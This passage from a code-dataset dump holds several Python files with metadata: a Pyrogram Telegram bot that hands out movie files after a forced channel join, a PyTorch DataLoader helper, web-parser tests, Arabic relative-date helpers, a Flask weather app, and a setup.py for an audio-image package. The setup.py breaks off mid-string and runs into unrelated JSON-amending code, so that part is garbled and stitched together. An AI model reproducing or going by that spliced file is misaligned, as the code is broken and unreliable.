𝗰𝗵𝗮𝗻𝗻𝗲𝗹 🤭\\n\\n🔊 ഞങ്ങളുടെ 𝙈𝙖𝙞𝙣 𝘾𝙝𝙖𝙣𝙣𝙚𝙡 ജോയിൻ ചെയ്താൽ മാത്രമേ സിനിമ ലഭിക്കുകയുള്ളൂ.... 
😁\\n\\nJoin ചെയ്ത ശേഷം Try Again ബട്ടൺ ക്ലിക്ക് ചെയ്യൂ.😁 **\",\n reply_markup=InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton(\"💢 JOIN OUR CHANNEL 💢\", url=invite_link.invite_link)\n ],\n [\n InlineKeyboardButton(\" 🔄 Try Again\", callback_data=f\"checksub#{file_id}\")\n ]\n ]\n ),\n parse_mode=\"markdown\"\n )\n return\n except Exception:\n await bot.send_message(\n chat_id=cmd.from_user.id,\n text=\"Something went Wrong.\",\n parse_mode=\"markdown\",\n disable_web_page_preview=True\n )\n return\n try:\n ident, file_id = cmd.text.split(\"_-_-_-_\")\n filedetails = await get_file_details(file_id)\n for files in filedetails:\n title = files.file_name\n size=files.file_size\n f_caption=files.caption\n if CUSTOM_FILE_CAPTION:\n try:\n f_caption=CUSTOM_FILE_CAPTION.format(file_name=title, file_size=size, file_caption=f_caption)\n except Exception as e:\n print(e)\n f_caption=f_caption\n if f_caption is None:\n f_caption = f\"{files.file_name}\"\n user_id = int(cmd.from_user.id)\n insert(user_id)\n buttons = [\n [\n InlineKeyboardButton('💢 Join Channel 💢', url='https://t.me/cinemacollections')\n ]]\n await bot.send_cached_media(\n chat_id=cmd.from_user.id,\n file_id=file_id,\n caption=f_caption,\n reply_markup=InlineKeyboardMarkup(buttons)\n )\n except Exception as err:\n await cmd.reply_text(f\"Something went wrong!\\n\\n**Error:** `{err}`\")\n elif len(cmd.command) > 1 and cmd.command[1] == 'subscribe':\n invite_link = await bot.create_chat_invite_link(int(AUTH_CHANNEL))\n await bot.send_photo(\n chat_id=cmd.from_user.id,\n photo=f\"{random.choice(PHOTO)}\",\n caption=\"**Please Join My Updates Channel to use this Bot!**\",\n reply_markup=InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton(\"💢 Join Channel 💢\", url=invite_link.invite_link)\n ]\n ]\n )\n )\n else:\n await cmd.reply_photo(\n photo=f\"{random.choice(PHOTO)}\",\n caption=START_MSG,\n reply_markup=InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton('❔ How To Use Me ❔', url='https://t.me/movieReqGroup1')\n ],[ \n InlineKeyboardButton(\"Sᴇᴀʀᴄʜ Hᴇʀᴇ 🔎\", switch_inline_query_current_chat=''),\n InlineKeyboardButton(\"Group 🗯\", url='https://t.me/movieReqGroup1')\n ],\n [\n InlineKeyboardButton('Dev👩💻', url='https://t.me/DhashamoolamDhamu'),\n InlineKeyboardButton(\"About💡\", callback_data=\"about\")\n ],\n [ InlineKeyboardButton('➕ Add Me To Your Group ', url='https://t.me/Anjalina_bot?startgroup=true'),]\n ]\n )\n )\n\n\n@Client.on_message(filters.command('channel') & filters.user(ADMINS))\nasync def channel_info(bot, message):\n \"\"\"Send basic information of channel\"\"\"\n if isinstance(CHANNELS, (int, str)):\n channels = [CHANNELS]\n elif isinstance(CHANNELS, list):\n channels = CHANNELS\n else:\n raise ValueError(\"Unexpected type of CHANNELS\")\n\n text = '📑 **Indexed channels/groups**\\n'\n for channel in channels:\n chat = await bot.get_chat(channel)\n if chat.username:\n text += '\\n@' + chat.username\n else:\n text += '\\n' + chat.title or chat.first_name\n\n text += f'\\n\\n**Total:** {len(CHANNELS)}'\n\n if len(text) < 4096:\n await message.reply(text)\n else:\n file = 'Indexed channels.txt'\n with open(file, 'w') as f:\n f.write(text)\n await message.reply_document(file)\n os.remove(file)\n\n\n@Client.on_message(filters.command('total') & filters.user(ADMINS))\nasync def total(bot, message):\n \"\"\"Show total files in database\"\"\"\n msg = await message.reply(\"Processing...⏳\", quote=True)\n try:\n total = await Media.count_documents()\n await msg.edit(f'📁 Saved files: {total}')\n except Exception as e:\n 
logger.exception('Failed to check total files')\n await msg.edit(f'Error: {e}')\n\n\n@Client.on_message(filters.command('logger') & filters.user(ADMINS))\nasync def log_file(bot, message):\n \"\"\"Send log file\"\"\"\n try:\n await message.reply_document('TelegramBot.log')\n except Exception as e:\n await message.reply(str(e))\n\n\n@Client.on_message(filters.command('delete') & filters.user(ADMINS))\nasync def delete(bot, message):\n \"\"\"Delete file from database\"\"\"\n reply = message.reply_to_message\n if reply and reply.media:\n msg = await message.reply(\"Processing...⏳\", quote=True)\n else:\n await message.reply('Reply to file with /delete which you want to delete', quote=True)\n return\n\n for file_type in (\"document\", \"video\", \"audio\"):\n media = getattr(reply, file_type, None)\n if media is not None:\n break\n else:\n await msg.edit('This is not supported file format')\n return\n\n result = await Media.collection.delete_one({\n 'file_name': media.file_name,\n 'file_size': media.file_size,\n 'mime_type': media.mime_type\n })\n if result.deleted_count:\n await msg.edit('File is successfully deleted from database')\n else:\n await msg.edit('File not found in database')\n@Client.on_message(filters.command('about'))\nasync def bot_info(bot, message):\n buttons = [\n [\n InlineKeyboardButton('💢 Channel 💢', url='https://t.me/cinemacollections'),\n InlineKeyboardButton('🗯 Group 🗯', url='https://t.me/movieReqGroup1')\n ]\n ]\n await message.reply(text=\"Developer : Aɴᴊᴀʟɪɴᴀ \\nCode : Ɗнαѕнαмσσℓαм \\nLanguage : Python3\\nLibrary : Pyrogram asyncio \\nSource Code : Cʟɪᴄᴋ Mᴇ \\nCʜᴀɴɴᴇʟ : Channel \", reply_markup=InlineKeyboardMarkup(buttons), disable_web_page_preview=True)\n\n@Client.on_message(filters.command('help'))\nasync def bot_info(bot, message):\n buttons = [\n [\n InlineKeyboardButton('💢 Channel 💢', url='https://t.me/Cinemacollections'),\n InlineKeyboardButton('🗯 Group 🗯', url='https://t.me/movieReqGroup1')\n ]\n ]\n await message.reply(text=\"\"\"🙋🏻♂️ Hellooo {user_name} 🤓\n \n▶️ ꜱᴇɴᴅ ᴛʜᴇ ᴄᴏʀʀᴇᴄᴛ ɴᴀᴍᴇ ᴏꜰ мovιᴇ ꜱᴇʀɪᴇꜱ ( ᴜꜱᴇ ɢᴏᴏɢʟᴇ.ᴄᴏᴍ ᴛᴏ ɢᴇᴛ ᴄᴏʀʀᴇᴄᴛ ɴᴀᴍᴇ ! ) .\n\n▫️ Exᴀᴍᴘʟᴇ 1 : Lᴜᴄɪꜰᴇʀ\n▫️ Exᴀᴍᴘʟᴇ 2 : Lᴜᴄɪꜰᴇʀ мᴀʟᴀʏᴀʟᴀм\n▫️ Exᴀᴍᴘʟᴇ 1 : Lᴜᴄɪꜰᴇʀ 2021\n\n🔺 ɪꜰ ʏᴏᴜ ᴄᴀɴᴛ ꜰɪɴᴅ ᴛʜᴇ мovιᴇ ᴛʜᴀᴛ ʏᴏᴜ ʟᴏᴏᴋɪɴɢ ꜰᴏʀ. 
ᴛʜᴇɴ ʏᴏᴜ ᴄᴀɴ ꜱᴇɴᴅ ᴀ ᴍᴇꜱꜱᴀɢᴇ ᴛᴏ Dᴇᴠ \"\"\", reply_markup=InlineKeyboardMarkup(buttons), disable_web_page_preview=True)\n\n@Client.on_message(filters.command('info') & (filters.private | filters.group))\nasync def showinfo(client, message):\n try:\n cmd, id = message.text.split(\" \", 1)\n except:\n id = False\n pass\n\n if id:\n if (len(id) == 10 or len(id) == 9):\n try:\n checkid = int(id)\n except:\n await message.reply_text(\"__Enter a valid USER ID__\", quote=True, parse_mode=\"md\")\n return\n else:\n await message.reply_text(\"__Enter a valid USER ID__\", quote=True, parse_mode=\"md\")\n return \n\n if Config.SAVE_USER == \"yes\":\n name, username, dcid = await find_user(str(id))\n else:\n try:\n user = await client.get_users(int(id))\n name = str(user.first_name + (user.last_name or \"\"))\n username = user.username\n dcid = user.dc_id\n except:\n name = False\n pass\n\n if not name:\n await message.reply_text(\"__USER Details not found!!__\", quote=True, parse_mode=\"md\")\n return\n else:\n if message.reply_to_message:\n name = str(message.reply_to_message.from_user.first_name\\\n + (message.reply_to_message.from_user.last_name or \"\"))\n id = message.reply_to_message.from_user.id\n username = message.reply_to_message.from_user.username\n dcid = message.reply_to_message.from_user.dc_id\n else:\n name = str(message.from_user.first_name\\\n + (message.from_user.last_name or \"\"))\n id = message.from_user.id\n username = message.from_user.username\n dcid = message.from_user.dc_id\n \n if not str(username) == \"None\":\n user_name = f\"@{username}\"\n else:\n user_name = \"none\"\n\n await message.reply_text(\n f\"UserInfo \\n\\n\"\n f\"Name : {name}\\n\"\n f\"UserID : {id}\\n\"\n f\"Username Name : {user_name}\\n\"\n f\"Permanant USER Link : Link ❗️ \\n\\n\"\n f\"@MovieReqGroup1 \",\n quote=True,\n parse_mode=\"html\"\n )\n\n@Client.on_message(filters.command('id') & (filters.private | filters.group))\nasync def showid(client, message):\n chat_type = message.chat.type\n\n if chat_type == \"private\":\n user_id = message.chat.id\n await message.reply_text(\n f\"Your ID : `{user_id}`\",\n parse_mode=\"md\",\n quote=True\n )\n elif (chat_type == \"group\") or (chat_type == \"supergroup\"):\n user_id = message.from_user.id\n chat_id = message.chat.id\n if message.reply_to_message:\n reply_id = f\"Replied User ID : `{message.reply_to_message.from_user.id}`\"\n else:\n reply_id = \"\"\n await message.reply_text(\n f\"Your ID : `{user_id}`\\nThis Group ID : `{chat_id}`\\n\\n{reply_id}\",\n parse_mode=\"md\",\n quote=True\n ) \n\n", "repo_name": "ccadmin1/anjalina-Imdb", "sub_path": "plugins/commands.py", "file_name": "commands.py", "file_ext": "py", "file_size_in_byte": 13905, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 11, "usage_type": "call"}, {"api_name": "db.mongo.getid", "line_number": 26, "usage_type": "call"}, {"api_name": "pyrogram.Client.on_message", "line_number": 22, "usage_type": "call"}, {"api_name": "pyrogram.Client", "line_number": 22, "usage_type": "name"}, {"api_name": "pyrogram.filters.private", "line_number": 22, "usage_type": "attribute"}, {"api_name": "pyrogram.filters", "line_number": 22, "usage_type": "name"}, {"api_name": "pyrogram.filters.user", "line_number": 22, "usage_type": "call"}, {"api_name": "info.ADMINS", "line_number": 22, "usage_type": "argument"}, {"api_name": "pyrogram.filters.command", "line_number": 22, "usage_type": "call"}, 
{"api_name": "info.AUTH_CHANNEL", "line_number": 40, "usage_type": "name"}, {"api_name": "info.AUTH_CHANNEL", "line_number": 41, "usage_type": "argument"}, {"api_name": "info.AUTH_CHANNEL", "line_number": 43, "usage_type": "argument"}, {"api_name": "pyrogram.errors.UserNotParticipant", "line_number": 52, "usage_type": "name"}, {"api_name": "random.choice", "line_number": 56, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardMarkup", "line_number": 58, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 61, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 64, "usage_type": "call"}, {"api_name": "utils.get_file_details", "line_number": 81, "usage_type": "call"}, {"api_name": "info.CUSTOM_FILE_CAPTION", "line_number": 86, "usage_type": "name"}, {"api_name": "info.CUSTOM_FILE_CAPTION.format", "line_number": 88, "usage_type": "call"}, {"api_name": "info.CUSTOM_FILE_CAPTION", "line_number": 88, "usage_type": "name"}, {"api_name": "db.mongo.insert", "line_number": 95, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 98, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardMarkup", "line_number": 104, "usage_type": "call"}, {"api_name": "info.AUTH_CHANNEL", "line_number": 109, "usage_type": "argument"}, {"api_name": "random.choice", "line_number": 112, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardMarkup", "line_number": 114, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 117, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 124, "usage_type": "call"}, {"api_name": "info.START_MSG", "line_number": 125, "usage_type": "name"}, {"api_name": "pyrogram.types.InlineKeyboardMarkup", "line_number": 126, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 129, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 131, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 132, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 135, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 136, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 138, "usage_type": "call"}, {"api_name": "pyrogram.Client.on_message", "line_number": 36, "usage_type": "call"}, {"api_name": "pyrogram.Client", "line_number": 36, "usage_type": "name"}, {"api_name": "pyrogram.filters.command", "line_number": 36, "usage_type": "call"}, {"api_name": "pyrogram.filters", "line_number": 36, "usage_type": "name"}, {"api_name": "info.CHANNELS", "line_number": 147, "usage_type": "argument"}, {"api_name": "info.CHANNELS", "line_number": 148, "usage_type": "name"}, {"api_name": "info.CHANNELS", "line_number": 149, "usage_type": "argument"}, {"api_name": "info.CHANNELS", "line_number": 150, "usage_type": "name"}, {"api_name": "info.CHANNELS", "line_number": 162, "usage_type": "argument"}, {"api_name": "os.remove", "line_number": 171, "usage_type": "call"}, {"api_name": "pyrogram.Client.on_message", "line_number": 144, "usage_type": "call"}, {"api_name": "pyrogram.Client", "line_number": 144, "usage_type": "name"}, {"api_name": "pyrogram.filters.command", "line_number": 144, "usage_type": "call"}, {"api_name": "pyrogram.filters", "line_number": 144, "usage_type": "name"}, {"api_name": 
"pyrogram.filters.user", "line_number": 144, "usage_type": "call"}, {"api_name": "info.ADMINS", "line_number": 144, "usage_type": "argument"}, {"api_name": "utils.Media.count_documents", "line_number": 179, "usage_type": "call"}, {"api_name": "utils.Media", "line_number": 179, "usage_type": "name"}, {"api_name": "pyrogram.Client.on_message", "line_number": 174, "usage_type": "call"}, {"api_name": "pyrogram.Client", "line_number": 174, "usage_type": "name"}, {"api_name": "pyrogram.filters.command", "line_number": 174, "usage_type": "call"}, {"api_name": "pyrogram.filters", "line_number": 174, "usage_type": "name"}, {"api_name": "pyrogram.filters.user", "line_number": 174, "usage_type": "call"}, {"api_name": "info.ADMINS", "line_number": 174, "usage_type": "argument"}, {"api_name": "pyrogram.Client.on_message", "line_number": 186, "usage_type": "call"}, {"api_name": "pyrogram.Client", "line_number": 186, "usage_type": "name"}, {"api_name": "pyrogram.filters.command", "line_number": 186, "usage_type": "call"}, {"api_name": "pyrogram.filters", "line_number": 186, "usage_type": "name"}, {"api_name": "pyrogram.filters.user", "line_number": 186, "usage_type": "call"}, {"api_name": "info.ADMINS", "line_number": 186, "usage_type": "argument"}, {"api_name": "utils.Media.collection.delete_one", "line_number": 213, "usage_type": "call"}, {"api_name": "utils.Media.collection", "line_number": 213, "usage_type": "attribute"}, {"api_name": "utils.Media", "line_number": 213, "usage_type": "name"}, {"api_name": "pyrogram.Client.on_message", "line_number": 195, "usage_type": "call"}, {"api_name": "pyrogram.Client", "line_number": 195, "usage_type": "name"}, {"api_name": "pyrogram.filters.command", "line_number": 195, "usage_type": "call"}, {"api_name": "pyrogram.filters", "line_number": 195, "usage_type": "name"}, {"api_name": "pyrogram.filters.user", "line_number": 195, "usage_type": "call"}, {"api_name": "info.ADMINS", "line_number": 195, "usage_type": "argument"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 226, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 227, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardMarkup", "line_number": 230, "usage_type": "call"}, {"api_name": "pyrogram.Client.on_message", "line_number": 222, "usage_type": "call"}, {"api_name": "pyrogram.Client", "line_number": 222, "usage_type": "name"}, {"api_name": "pyrogram.filters.command", "line_number": 222, "usage_type": "call"}, {"api_name": "pyrogram.filters", "line_number": 222, "usage_type": "name"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 236, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 237, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardMarkup", "line_number": 248, "usage_type": "call"}, {"api_name": "pyrogram.Client.on_message", "line_number": 232, "usage_type": "call"}, {"api_name": "pyrogram.Client", "line_number": 232, "usage_type": "name"}, {"api_name": "pyrogram.filters.command", "line_number": 232, "usage_type": "call"}, {"api_name": "pyrogram.filters", "line_number": 232, "usage_type": "name"}, {"api_name": "pyrogram.Client.on_message", "line_number": 250, "usage_type": "call"}, {"api_name": "pyrogram.Client", "line_number": 250, "usage_type": "name"}, {"api_name": "pyrogram.filters.command", "line_number": 250, "usage_type": "call"}, {"api_name": "pyrogram.filters", "line_number": 250, "usage_type": "name"}, {"api_name": 
"pyrogram.filters.private", "line_number": 250, "usage_type": "attribute"}, {"api_name": "pyrogram.filters.group", "line_number": 250, "usage_type": "attribute"}, {"api_name": "pyrogram.Client.on_message", "line_number": 314, "usage_type": "call"}, {"api_name": "pyrogram.Client", "line_number": 314, "usage_type": "name"}, {"api_name": "pyrogram.filters.command", "line_number": 314, "usage_type": "call"}, {"api_name": "pyrogram.filters", "line_number": 314, "usage_type": "name"}, {"api_name": "pyrogram.filters.private", "line_number": 314, "usage_type": "attribute"}, {"api_name": "pyrogram.filters.group", "line_number": 314, "usage_type": "attribute"}]}
+{"seq_id": "2437004195", "text": "from torch.utils.data import DataLoader\n\n\ndef create_dataloader(opt):\n \"\"\"\n 从opt参数中创建dataloader\n :param opt (): a subclass of BaseOption\n :return dataloader (): A class of torch.utils.data.Dataloader\n \"\"\"\n name = opt.name\n if name == 'auto_encoder_train_option' or name == 'auto_encoder_test_option':\n from data.image_dataset import ImageDataset\n dataset = ImageDataset(opt)\n elif name == 'image_generator_train_option' or name == 'image_generator_test_option':\n from data.image_edge_dataset import ImageEdgeDataset\n dataset = ImageEdgeDataset(opt)\n else:\n raise ValueError(\"不存在option [%s] 所对应的数据集\" % name)\n\n dataloader = DataLoader(dataset, batch_size=opt.batch_size, shuffle=opt.shuffle, num_workers=0)\n return dataloader\n", "repo_name": "JudgementH/DeepFaceDrawing", "sub_path": "data/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 844, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "data.image_dataset.ImageDataset", "line_number": 13, "usage_type": "call"}, {"api_name": "data.image_edge_dataset.ImageEdgeDataset", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 20, "usage_type": "call"}]}
+{"seq_id": "72454164328", "text": "from setuptools import setup, find_packages\r\nfrom setuptools.command.install import install\r\nimport codecs\r\nimport os, sys, subprocess\r\n\r\n\r\nVERSION = '0.1.17'\r\nDESCRIPTION = 'A Python audio image creation tool'\r\nLONG_DESCRIPTION = 'A Python audio image creation tool that takes audio and creates images from them.'\r\n\r\n\r\n# Setting up\r\nsetup(\r\n name=\"synesthesia-uf\",\r\n version=VERSION,\r\n author=\"Super Fun Adventure Club Dude Man Squad\",\r\n author_email=\" new format code\n \n newContents = OrderedDict()\n\n newContents[\"root\"] = contents[\"root\"]\n newContents[\"redirection\"] = contents[\"redirection\"]\n newContents[\"from\"] = []\n for elm in newContents[\"from\"]:\n newContents[\"from\"].append(elm)\n\n newContents[\"data\"] = []\n\n for data in contents[\"data\"]:\n _temp = OrderedDict()\n\n _temp[\"_usage\"] = data[\"_usage\"]\n\n # print(contents[\"root\"])\n _temp[\"_speech\"] = []\n for elm in data[\"_speech\"]:\n _temp[\"_speech\"].append(elm)\n\n _temp[\"_video\"] = data[\"_video\"]\n _temp[\"_chunks\"] = []\n for elm in data[\"_chunks\"]:\n _temp[\"_chunks\"].append(elm)\n\n _temp[\"_text\"] = []\n\n newContents[\"data\"].append(_temp)\n\n # print(newContents)\n \n # startIndex = 0\n # endIndex = contents.find('')\n # contents=\"\".join((contents[:startIndex],'',contents[endIndex:]))\n # print(contents)\n \n with io.open(savePath + \"/\" + d,\"w\", encoding=\"utf-8\") as openFileToWrite:\n openFileToWrite.write(json.dumps(newContents, ensure_ascii=False, indent=\"\\t\"))\n\namend(targetPath)", "repo_name": "freean2468/koreng", "sub_path": "koreng_mongo/amendIterator.py", "file_name": "amendIterator.py", "file_ext": "py", "file_size_in_byte": 3501, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.getcwd", "line_number": 12, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 13, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 25, "usage_type": "call"}, {"api_name": "io.open", "line_number": 31, "usage_type": "call"}, {"api_name": "json.load", "line_number": 33, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 54, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 65, "usage_type": "call"}, {"api_name": "io.open", "line_number": 90, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 91, "usage_type": "call"}]}
+{"seq_id": "14062740346", "text": "import unittest\n\nimport lxml\nimport requests\n\nfrom webparser.parser import convert_to_doc, FeedParser, fuzzy_url_search, has_rss_feed\nfrom webparser.utils import root_path\n\n\nclass TestParser(unittest.TestCase):\n def setUp(self):\n self.english_text = None\n with open(root_path() + \"/tests/data/medium_botify.txt\", \"r\") as w:\n self.english_text = w.read()\n\n self.chinese_text = None\n with open(root_path() + \"/tests/data/chinese_text_parsing.txt\", \"r\") as w:\n self.chinese_text = w.read()\n\n self.url = 'https://medium.com/botify-labs/no-fuss-no-ego-code-reviews-done-right-de69b5cf76e3'\n\n def test_convert_to_doc_with_text(self):\n res = convert_to_doc(self.english_text)\n\n if (res.text_content()):\n assert True\n if (isinstance(res, lxml.html.HtmlElement)):\n assert True\n\n def test_convert_to_doc_with_requests(self):\n res = requests.get(self.url)\n text = convert_to_doc(res.content)\n if text.text_content():\n assert True\n\n def test_chinese_text(self):\n text = convert_to_doc(self.chinese_text)\n if text.text_content():\n assert True\n\n\nclass TestFeedParser(unittest.TestCase):\n def setUp(self):\n self.viralnova = 'https://viralnova.com/feed'\n self.techcrunch = 'https://techcrunch.com/feed'\n self.feed_url_exists = 'https://techcrunch.com'\n self.no_feed_exists_url = 'https://contentstudio.io'\n\n def test_viralnova(self):\n feed = FeedParser(self.viralnova)\n res = feed.parse()\n if len(res['feeds']) > 5:\n assert True\n\n def test_techcrunch(self):\n feed = FeedParser(self.techcrunch)\n res = feed.parse()\n if len(res['feeds']) > 5:\n assert True\n\n def test_fuzzy_url_search(self):\n status = fuzzy_url_search(self.feed_url_exists, [])\n if (len(status) > 0):\n assert True\n\n status = fuzzy_url_search(self.no_feed_exists_url, [])\n if len(status) == 0:\n assert True\n\n def test_has_rss_feed(self):\n res = requests.get(self.feed_url_exists)\n has_feed= has_rss_feed(res.content, self.feed_url_exists)\n print(has_feed)\n", "repo_name": "d4interactive/webparser", "sub_path": "tests/test_parser.py", "file_name": "test_parser.py", "file_ext": "py", "file_size_in_byte": 2250, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "unittest.TestCase", "line_number": 10, "usage_type": "attribute"}, {"api_name": "webparser.utils.root_path", "line_number": 13, "usage_type": "call"}, {"api_name": "webparser.utils.root_path", "line_number": 17, "usage_type": "call"}, {"api_name": "webparser.parser.convert_to_doc", "line_number": 23, "usage_type": "call"}, {"api_name": "lxml.html", "line_number": 27, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 31, "usage_type": "call"}, {"api_name": "webparser.parser.convert_to_doc", "line_number": 32, "usage_type": "call"}, {"api_name": "webparser.parser.convert_to_doc", "line_number": 37, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 42, "usage_type": "attribute"}, {"api_name": "webparser.parser.FeedParser", "line_number": 50, "usage_type": "call"}, {"api_name": "webparser.parser.FeedParser", "line_number": 56, "usage_type": "call"}, {"api_name": "webparser.parser.fuzzy_url_search", "line_number": 62, "usage_type": "call"}, {"api_name": "webparser.parser.fuzzy_url_search", "line_number": 66, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 71, "usage_type": "call"}, {"api_name": "webparser.parser.has_rss_feed", "line_number": 72, "usage_type": "call"}]}
+{"seq_id": "1982601263", "text": "from datetime import timedelta, datetime\n\n\ndef clean_day(days_as_text: str):\n if \"يوم\" in days_as_text:\n today = datetime.today()\n last_day = today - timedelta(days=1)\n return last_day.strftime(\"%Y-%m-%d\")\n\n if \"يومين\" in days_as_text:\n today = datetime.today()\n last_2_days = today - timedelta(days=1)\n return last_2_days.strftime(\"%Y-%m-%d\")\n\n if \"ايام\" in days_as_text:\n number_of_days = [int(number) for number in days_as_text if number.isdigit()]\n today = datetime.today()\n last_n_days = today - timedelta(days=number_of_days[0])\n return last_n_days.strftime(\"%Y-%m-%d\")\n\n return \"unknown day\"\n\n\ndef clean_week(weeks_as_text: str):\n\n if \"اسبوع\" in weeks_as_text:\n today = datetime.today()\n last_week = today - timedelta(days=7)\n return last_week.strftime(\"%Y-%m-%d\")\n\n if \"اسبوعين\" in weeks_as_text:\n today = datetime.today()\n last_2_weeks = today - timedelta(days=14)\n return last_2_weeks.strftime(\"%Y-%m-%d\")\n\n if \"اسابيع\" in weeks_as_text:\n number_of_weeks = [int(number) for number in weeks_as_text if number.isdigit()]\n today = datetime.today()\n last_n_weeks = today - timedelta(days=number_of_weeks[0] * 7)\n return last_n_weeks.strftime(\"%Y-%m-%d\")\n\n return \"unknown week\"\n\n\ndef clean_month(months_as_text: str):\n if \"شهر\" in months_as_text:\n today = datetime.today()\n first = today.replace(day=30)\n last_month = first - timedelta(days=1)\n return last_month.strftime(\"%Y-%m-%d\")\n\n if \"شهرين\" in months_as_text:\n today = datetime.today()\n first = today.replace(day=60)\n last_2_month = first - timedelta(days=1)\n return last_2_month.strftime(\"%Y-%m-%d\")\n\n if \"شهور\" in months_as_text:\n number_of_months = [\n int(number) for number in months_as_text if number.isdigit()\n ]\n today = datetime.today()\n first = today.replace(day=number_of_months[0] * 30)\n last_n_month = first - timedelta(days=1)\n return last_n_month.strftime(\"%Y-%m-%d\")\n\n return \"unknown month\"\n", "repo_name": "NafieAlhilaly/aqar-scraper", "sub_path": "app/helpers/date_helpers.py", "file_name": "date_helpers.py", "file_ext": "py", "file_size_in_byte": 2196, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "datetime.datetime.today", "line_number": 6, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 6, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 7, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 11, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 11, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 12, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 17, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 17, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 18, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 27, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 27, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 28, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 32, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 32, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 33, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 38, "usage_type": "call"}, 
{"api_name": "datetime.datetime", "line_number": 38, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 39, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 47, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 47, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 49, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 53, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 53, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 55, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 62, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 62, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 64, "usage_type": "call"}]}
+{"seq_id": "5920581031", "text": "\nimport logging\n\nfrom functions.format_weather import *\nfrom flask import Flask, request, render_template\n\nlogging.basicConfig(filename=\"Basic.log\")\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef search_weather():\n return render_template(\"form.html\")\n\n\n@app.route('/search/', methods=['POST'])\ndef weather():\n try:\n s = request.values[\"s\"]\n weather = format_weather(get_weather(get_coordinates(s)))\n return render_template(\"weather.html\", weather=weather)\n except Exception:\n return \"Sorry, page not found 404 ;(\"\n\n\nif __name__ == '__main__':\n app.run()\n", "repo_name": "SergeyCicada/TypedWeather", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 592, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.basicConfig", "line_number": 7, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 9, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 14, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 20, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 20, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 22, "usage_type": "call"}]}
